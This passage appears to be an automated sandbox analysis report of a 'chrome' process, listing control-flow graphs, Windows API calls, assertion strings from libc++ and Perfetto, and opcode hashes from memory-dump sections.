                                                    • Opcode Fuzzy Hash: f14f3843dd05a5161a2dceedddc51dcf0a1cab14cd6e4646435bb06f5836003c
                                                    • Instruction Fuzzy Hash: 6131E774A0020EAFDB04DF65D855A5ABBB9FF89310F08C52DF8086F311E770A985CBA0

                                                    Control-flow Graph

                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F03578,00D36A79,?,?,00DBE05C,?,-00000048,?), ref: 00D36AEC
                                                    • ReleaseSRWLockExclusive.KERNEL32(00F03578,?,?,?,?,?,?,?,00DBE05C,?,-00000048,?), ref: 00D36B6D
                                                      • Part of subcall function 00D39990: LoadLibraryW.KERNELBASE(bcryptprimitives.dll,00000000,?,?,00DF6F07,?,?,?), ref: 00D399BC
                                                      • Part of subcall function 00D39990: GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D399CC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireAddressLibraryLoadProcRelease
                                                    • String ID:
                                                    • API String ID: 969684755-0
                                                    • Opcode ID: 1e36830e5300080cd79b18d81774a8ddf829615f8b49ba5b673bd1a2565619d4
                                                    • Instruction ID: e47608b4d9a6b8373cf7cbc53a360de80231c6e0cc63ebb40d5b1ff6712ad92d
                                                    • Opcode Fuzzy Hash: 1e36830e5300080cd79b18d81774a8ddf829615f8b49ba5b673bd1a2565619d4
                                                    • Instruction Fuzzy Hash: 7C31BB71E002159FD310DF2AEC40626F7EAFBC8310F49812DE895E73A1E6709D45EB91

                                                    Control-flow Graph

                                                    APIs
                                                    • ConvertThreadToFiberEx.KERNEL32(00000000,00000001), ref: 00D40A5C
                                                    • CreateFiberEx.KERNELBASE(00000000,00400000,00000001,00D409F0,?), ref: 00D40A85
                                                    • SwitchToFiber.KERNEL32(00000000), ref: 00D40A96
                                                    • DeleteFiber.KERNEL32(00000000), ref: 00D40A9D
                                                    • ConvertFiberToThread.KERNEL32 ref: 00D40AA3
                                                    • GetLastError.KERNEL32 ref: 00D410ED
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Fiber$ConvertThread$CreateDeleteErrorLastSwitch
                                                    • String ID:
                                                    • API String ID: 3693343117-0
                                                    • Opcode ID: a87e30cb9f83e54ffe0c5153c62cfc7a47ff9ed4b5bf1b409bd2093d6aa9f2bc
                                                    • Instruction ID: f94b0c01cdf63d801418a07cdf5e6b4e9c4cd6c2b6620c59babd214abe105035
                                                    • Opcode Fuzzy Hash: a87e30cb9f83e54ffe0c5153c62cfc7a47ff9ed4b5bf1b409bd2093d6aa9f2bc
                                                    • Instruction Fuzzy Hash: 550162756403449FE7209F71EC89B6677A4FB04305F18443DF50BEA291DA75E849CB22

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 172 dbae00-dbae22 173 dbaf31-dbaf36 172->173 174 dbaf38-dbaf6f call dbabb0 TryAcquireSRWLockExclusive 173->174 175 dbaf26-dbaf2f 173->175 180 dbaf7f-dbaf86 call dbcf90 174->180 181 dbaf71-dbaf77 174->181 175->173 177 dbaf88-dbaf9a call e29b55 175->177 180->181 183 dbaf7d 181->183 184 dbaee4-dbaee8 181->184 186 dbaf00-dbaf24 ReleaseSRWLockExclusive 183->186 188 dbaeee-dbaef0 184->188 189 dbae30-dbae3a 184->189 186->175 192 dbae4f-dbae93 188->192 190 dbafa1-dbaff4 call e76310 call d369d0 call e76310 call d369d0 call e7e760 189->190 191 dbae40-dbae46 189->191 191->190 193 dbae4c 191->193 194 dbae99-dbaeb7 192->194 195 dbaf9e-dbaf9f 192->195 193->192 197 dbaf9b-dbaf9c 194->197 198 dbaebd-dbaed8 194->198 195->190 197->195 201 dbaeda-dbaedc 198->201 202 dbaef5-dbaefc call dba2d0 198->202 201->202 204 dbaede-dbaee2 201->204 202->204 204->184 204->186
                                                    APIs
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000001,00000001), ref: 00DBAF04
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBAF67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 9644d76b3e557d744bcf709a5655c47fdaa42e911e5ba1dcfae07345d831f2cd
                                                    • Instruction ID: f71490b89a62018c1be34442aa9da2a26a1fde98bdd76f1094b05091a528eeac
                                                    • Opcode Fuzzy Hash: 9644d76b3e557d744bcf709a5655c47fdaa42e911e5ba1dcfae07345d831f2cd
                                                    • Instruction Fuzzy Hash: 8C510471600742DBD7108F29C4806B6FBE2EFC8314F18C67EF49A8B299D735D84287A2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 237 d369e0-d369f3 238 d369f5 237->238 239 d36a0f-d36a12 237->239 240 d369fa-d36a0a VirtualAlloc 238->240 241 d36a43-d36a44 239->241 242 d36a14 239->242 243 d36a22-d36a2d GetLastError 240->243 244 d36a0c-d36a0e 240->244 245 d36a46-d36a4b 241->245 242->240 242->241 242->245 246 d36a1b-d36a20 242->246 247 d36a4d-d36a5c VirtualFree 242->247 249 d36a36-d36a37 call e74680 243->249 250 d36a2f-d36a34 243->250 245->240 246->240 247->244 248 d36a5e-d36a66 GetLastError 247->248 248->244 251 d36a68-d36a6b 248->251 252 d36a3c-d36a3e 249->252 250->249 250->252 252->244 254 d36a40-d36a41 252->254 254->241
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00001000,00000020), ref: 00D36A02
                                                    • GetLastError.KERNEL32 ref: 00D36A22
                                                    • VirtualFree.KERNEL32(?,?,00004000), ref: 00D36A54
                                                    • GetLastError.KERNEL32 ref: 00D36A5E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastVirtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2325269287-0
                                                    • Opcode ID: 77613445567b07231a26d258e67649cc6fdf3ddf09f48567c04a418c0d2e33ac
                                                    • Instruction ID: 6b6415494317b9b798e1db0ff728bf928e6bec4f63ce24f5044cf2fcd442abcc
                                                    • Opcode Fuzzy Hash: 77613445567b07231a26d258e67649cc6fdf3ddf09f48567c04a418c0d2e33ac
                                                    • Instruction Fuzzy Hash: 4B01A270700189BBEB245B62DC5C76A375DEB56796F1CC838FA06BA180D674DC408575

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 255 db9fa0-db9fac 256 dba119-dba120 255->256 257 db9fb2-db9ff0 255->257 258 dba03e-dba042 257->258 259 db9ff2-db9ff8 257->259 262 dba048-dba05e 258->262 263 dba162-dba179 TryAcquireSRWLockExclusive 258->263 260 db9ffe-dba014 259->260 261 dba121-dba12a 259->261 264 dba01a-dba01c 260->264 265 dba20c-dba215 call dba290 260->265 270 dba135-dba138 261->270 266 dba272-dba27a call e29694 262->266 267 dba064-dba07c 262->267 268 dba24a-dba252 call dbcf90 263->268 269 dba17f-dba18f 263->269 271 dba020-dba029 264->271 295 dba21d-dba245 265->295 267->263 274 dba082-dba095 267->274 268->269 276 dba27f-dba280 269->276 277 dba195-dba1b3 269->277 278 dba14e-dba15e 270->278 271->271 279 dba02b-dba02d 271->279 283 dba09b-dba0a0 274->283 284 dba263 274->284 282 dba282-dba285 276->282 277->282 286 dba1b9-dba1de 277->286 278->263 287 dba26a-dba26d call e762c0 279->287 288 dba033-dba038 279->288 289 dba142-dba146 283->289 290 dba0a6-dba0bc 283->290 284->287 291 dba1ee-dba1f2 call dba2d0 286->291 292 dba1e0-dba1e9 ReleaseSRWLockExclusive 286->292 287->266 288->258 288->295 289->270 294 dba148-dba14b 289->294 296 dba13a-dba13e 290->296 297 dba0be-dba0f1 290->297 301 dba1f7 291->301 292->256 294->278 295->256 296->289 299 dba1f9-dba207 call dba770 297->299 300 dba0f7-dba0fd 297->300 299->265 303 dba103-dba115 300->303 304 dba257-dba25e call dbae00 300->304 301->292 303->256 304->284
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(656D6DA9,00000000,-00000004,?,?,?,00D49E75,00EDFE90,-00000004,00000000), ref: 00DBA171
                                                    • ReleaseSRWLockExclusive.KERNEL32(00D49E75,00000001,?,00D49E75,00EDFE90,-00000004,00000000), ref: 00DBA1E3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID:
                                                    • API String ID: 17069307-0
                                                    • Opcode ID: 5ef8575474eda1cce7b1aabcbaf8e9f5e48b81c8c8e833e6d8f420050c7db516
                                                    • Instruction ID: c288eee0f18588472c2648666a3400a964c2894ee8774254029345ffee1b045a
                                                    • Opcode Fuzzy Hash: 5ef8575474eda1cce7b1aabcbaf8e9f5e48b81c8c8e833e6d8f420050c7db516
                                                    • Instruction Fuzzy Hash: 0F81EB70600201CFDB68CF2DC884BB5B7F5FF41364F0885A9E86A8B696D735E845CB61

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 322 d36a70-d36a74 call d36ad0 324 d36a79-d36a83 322->324 325 d36a85-d36a87 324->325 326 d36a9e-d36ab2 GetCurrentProcess IsWow64Process 324->326 327 d36a97 325->327 328 d36a89-d36a95 325->328 329 d36ab4-d36ab9 326->329 330 d36abb-d36ac5 326->330 331 d36a99-d36a9d 327->331 328->331 329->325 330->327
                                                    APIs
                                                      • Part of subcall function 00D36AD0: TryAcquireSRWLockExclusive.KERNEL32(00F03578,00D36A79,?,?,00DBE05C,?,-00000048,?), ref: 00D36AEC
                                                      • Part of subcall function 00D36AD0: ReleaseSRWLockExclusive.KERNEL32(00F03578,?,?,?,?,?,?,?,00DBE05C,?,-00000048,?), ref: 00D36B6D
                                                    • GetCurrentProcess.KERNEL32(?,?,00DBE05C,?,-00000048,?), ref: 00D36A9E
                                                    • IsWow64Process.KERNEL32(00000000,00EF2550,?,00DBE05C,?,-00000048,?), ref: 00D36AAA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                    • String ID:
                                                    • API String ID: 2898688079-0
                                                    • Opcode ID: a029f129578b6ea87f8ee35dc335decfb79c93c2f4757a0cfab23af7d0a5906e
                                                    • Instruction ID: 61ab1dad5adfc8c6a1132a6e4f4a68b418354817a80c2e65c13d4c9ae3126073
                                                    • Opcode Fuzzy Hash: a029f129578b6ea87f8ee35dc335decfb79c93c2f4757a0cfab23af7d0a5906e
                                                    • Instruction Fuzzy Hash: 1BE0657160021A6BC2105B7D6C4972137D8A744755F1DC118FA09F7294F750EC0993B2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 332 e4361b-e4362f GetLastError 333 e43631-e43639 call e43d14 332->333 334 e4364b-e43655 call e43d53 332->334 339 e43646 333->339 340 e4363b-e43644 333->340 341 e43657-e43659 334->341 342 e4365b-e43663 call e24570 334->342 339->334 343 e436c0-e436cb SetLastError 340->343 341->343 345 e43668-e4366e 342->345 346 e43670-e4367f call e43d53 345->346 347 e43681-e4368f call e43d53 345->347 352 e436a0-e436a6 call e13f40 346->352 353 e43691-e4369f call e43d53 347->353 354 e436a8-e436bd call e437dc call e13f40 347->354 361 e436bf 352->361 353->352 354->361 361->343
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00E28151,00E58715,?,00000000,?,00E7476B,?,?), ref: 00E4361F
                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E7476B,?,?), ref: 00E436C1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 844524f6b58c680a952cfa4c058a056894216cf55678e86fc66eee4764087d5a
                                                    • Instruction ID: e81cd3ab95d7a37efd350c095f92855477292974dec19917c53b202a12fda0a1
                                                    • Opcode Fuzzy Hash: 844524f6b58c680a952cfa4c058a056894216cf55678e86fc66eee4764087d5a
                                                    • Instruction Fuzzy Hash: 00116630B042177ED321BB7AFCC6EAB36DC9B407AC7252274F118B62F1DA508F084120

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 364 e4727b-e4728f 365 e47291-e47296 364->365 366 e472fd-e47305 364->366 365->366 369 e47298-e4729d 365->369 367 e47307-e4730a 366->367 368 e4734c-e47364 call e47415 366->368 367->368 372 e4730c-e47349 call e13f40 * 4 367->372 376 e47367-e4736e 368->376 369->366 371 e4729f-e472a2 369->371 371->366 374 e472a4-e472ac 371->374 372->368 377 e472c6-e472ce 374->377 378 e472ae-e472b1 374->378 380 e47370-e47374 376->380 381 e4738d-e47391 376->381 383 e472d0-e472d3 377->383 384 e472e8-e472fc call e13f40 * 2 377->384 378->377 382 e472b3-e472c5 call e13f40 call e46701 378->382 387 e47376-e47379 380->387 388 e4738a 380->388 392 e47393-e47398 381->392 393 e473a9-e473b5 381->393 382->377 383->384 390 e472d5-e472e7 call e13f40 call e46a1d 383->390 384->366 387->388 396 e4737b-e47389 call e13f40 * 2 387->396 388->381 390->384 400 e473a6 392->400 401 e4739a-e4739d 392->401 393->376 395 e473b7-e473c2 call e13f40 393->395 396->388 400->393 401->400 408 e4739f-e473a0 call e13f40 401->408 416 e473a5 408->416 416->400
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 3903695350-0
                                                    • Opcode ID: 1b8e3de17a4181de67a2670a70573f76f6783f5fbbe3d2eeb02e224c7e80adc5
                                                    • Instruction ID: 044a7ae8cc0846e6776b08012aa29b46ca2409f0fd063e48e18261f6940a0699
                                                    • Opcode Fuzzy Hash: 1b8e3de17a4181de67a2670a70573f76f6783f5fbbe3d2eeb02e224c7e80adc5
                                                    • Instruction Fuzzy Hash: 4B319C71A082019FEB30AE79EC05B9AB3E8AF04718F106469F498F71A1DB70ED80DB54
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000004,?,?), ref: 00D382EC
                                                    • GetLastError.KERNEL32 ref: 00D38301
                                                    • SetLastError.KERNEL32(00000000), ref: 00D3830F
                                                    • GetLastError.KERNEL32 ref: 00D38332
                                                    • SetLastError.KERNEL32(00000000), ref: 00D38343
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3851D
                                                    • K32GetModuleInformation.KERNEL32(00000000,?,?,0000000C,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38530
                                                    • GetLastError.KERNEL32(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3856F
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3857D
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38591
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D385B1
                                                    • GetSystemInfo.KERNEL32(?), ref: 00D38686
                                                    • GetLastError.KERNEL32(00ED1384,..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type,?,?,?), ref: 00D386B8
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38700
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D386A9
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D380E3, 00D381D0
                                                    • {}-, xrefs: 00D3846C
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D386A2
                                                    • PERFETTO_CHECK(key), xrefs: 00D3826D
                                                    • ..\..\third_party\perfetto\src\tracing\event_context.cc, xrefs: 00D38229, 00D3825E
                                                    • PERFETTO_CHECK(tls_state_), xrefs: 00D38238
                                                    • %s (errno: %d, %s), xrefs: 00D3823D, 00D38272
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$Module$CurrentFreeHandleInfoInformationLibraryProcessSystem
                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\perfetto\src\tracing\event_context.cc$PERFETTO_CHECK(key)$PERFETTO_CHECK(tls_state_)${}-
                                                    • API String ID: 4075626267-2919275849
                                                    • Opcode ID: 929d171d432bb3b22d24d4d197da167c522b001e940d56f9e72a03dfe1e911c2
                                                    • Instruction ID: 5cea5c636d4c7f7e3e2be2ee4bf4a2d7533737cafb8e085439c20b890ac217e2
                                                    • Opcode Fuzzy Hash: 929d171d432bb3b22d24d4d197da167c522b001e940d56f9e72a03dfe1e911c2
                                                    • Instruction Fuzzy Hash: 3C227EB5E003199FDB20DF65D885A9EBBB4FF45300F248129F819BB351EB30A945DBA1
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,00D73FE0,00000000,00000000,00000000), ref: 00D48CC1
                                                    • CreateThread.KERNEL32(00000000,00000000,00D73FE0,00000000,00000000,00000000), ref: 00D48D41
                                                      • Part of subcall function 00D49620: VerSetConditionMask.KERNEL32 ref: 00D4968B
                                                      • Part of subcall function 00D49620: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00D49697
                                                      • Part of subcall function 00D49620: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003,?,00000001,00000003), ref: 00D496A3
                                                      • Part of subcall function 00D49620: VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 00D496C3
                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00D48D76
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48DE7
                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00D48E0F
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D48E1E
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48E80
                                                    • WaitForSingleObject.KERNEL32(?,-00000001), ref: 00D48F23
                                                    • WaitForSingleObject.KERNEL32(?,-00000001), ref: 00D48F2A
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D48F30
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48F67
                                                    • CloseHandle.KERNEL32(?), ref: 00D48F76
                                                    • CloseHandle.KERNEL32(?), ref: 00D48F89
                                                      • Part of subcall function 00E89540: _strlen.LIBCMT ref: 00E89550
                                                      • Part of subcall function 00D491B0: UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D1
